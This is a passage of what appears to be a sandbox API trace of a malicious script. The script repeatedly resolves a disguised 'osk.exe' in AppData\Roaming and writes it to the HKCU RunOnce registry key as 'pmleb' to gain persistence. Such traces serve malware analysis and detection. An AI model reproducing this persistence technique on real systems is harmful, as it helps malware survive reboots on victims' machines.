rgDispId=0x33f050*=10012) returned 0x0 [0079.660] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.660] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.660] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.660] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.660] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.660] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.660] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.660] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.660] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x49 [0079.660] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.660] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4a [0079.660] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.661] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x49 [0079.661] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.661] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.661] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.661] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.661] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.661] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.661] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.662] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.662] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.662] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.662] RegCloseKey (hKey=0x280) returned 0x0 [0079.662] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.662] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.662] SetTimer (hWnd=0x20280, nIDEvent=0x2049, uElapse=0xa, lpTimerFunc=0x0) returned 0x2049 [0079.662] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.675] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.675] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.675] KillTimer (hWnd=0x20280, uIDEvent=0x2049) returned 1 [0079.675] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.675] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.675] IUnknown:Release (This=0x787518) returned 0x1 [0079.676] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.676] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.676] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.676] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.676] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.676] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.676] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.676] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.676] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.676] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4a [0079.676] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.676] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4b [0079.676] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.677] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4a [0079.677] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.677] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.677] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.677] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.677] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.677] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.677] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.677] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.678] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.678] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.678] RegCloseKey (hKey=0x280) returned 0x0 [0079.678] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.678] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.678] SetTimer (hWnd=0x20280, nIDEvent=0x204a, uElapse=0xa, lpTimerFunc=0x0) returned 0x204a [0079.678] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.690] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.690] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.690] KillTimer (hWnd=0x20280, uIDEvent=0x204a) returned 1 [0079.691] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.691] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.691] IUnknown:Release (This=0x787518) returned 0x1 [0079.691] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.691] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.691] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.691] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.691] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.691] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.691] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.691] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.691] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.692] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4b [0079.692] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.692] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4c [0079.692] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.692] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4b [0079.692] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.693] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.693] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.693] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.693] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.693] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.693] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.693] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.693] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.693] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.693] RegCloseKey (hKey=0x280) returned 0x0 [0079.693] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.693] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.693] SetTimer (hWnd=0x20280, nIDEvent=0x204b, uElapse=0xa, lpTimerFunc=0x0) returned 0x204b [0079.694] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.706] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.706] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.706] KillTimer (hWnd=0x20280, uIDEvent=0x204b) returned 1 [0079.706] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.707] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | 